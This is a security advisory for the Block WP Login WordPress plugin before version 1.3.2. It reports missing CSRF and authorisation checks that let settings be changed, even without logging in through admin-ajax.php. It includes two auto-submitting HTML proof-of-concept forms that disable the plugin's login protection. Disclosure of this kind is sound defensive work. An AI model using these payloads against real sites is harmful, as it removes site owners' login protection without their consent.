Block WP Login < 1.3.2 – CSRF and Unauthorised Settings Update

Description

Lack of CSRF and authorisation checks in the bwpl_configure_slug() function registered as an admin_init action could allow attacker (via CSRF, or unauthenticated using the admin-ajax.php) to change the plugin settings (located at /wp-admin/options-permalink.php) and disable the protection offered.

v1.3.1 added a nonce check, but not authorisation checks - vendor contacted about it.
v1.3.2 added the authorisation checks

Proof of Concept

Settings Update via CSRF:

<html>
  <body onload="document.forms[0].submit()">
    <form action="https://<BLOG>/wp-admin/options-permalink.php" method="POST">
      <input type="hidden" name="bwpl_slug" value="" />
      <input type="hidden" name="bwpl_ajax" value="" />
      <input type="hidden" name="bwpl_cron" value="" />
      <input type="hidden" name="bwpl_xmlrpc" value="" />
      <input type="hidden" name="bwpl_robots" value="true" />
    </form>
  </body>
</html>

Settings Update as Unauthenticated using admin-ajax.php:
<html>
  <body onload="document.forms[0].submit()">
    <form action="https://<BLOG>/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="a" />
      <input type="hidden" name="bwpl_slug" value="" />
      <input type="hidden" name="bwpl_ajax" value="" />
      <input type="hidden" name="bwpl_cron" value="" />
      <input type="hidden" name="bwpl_xmlrpc" value="true" />
      <input type="hidden" name="bwpl_robots" value="" />
    </form>
  </body>
</html>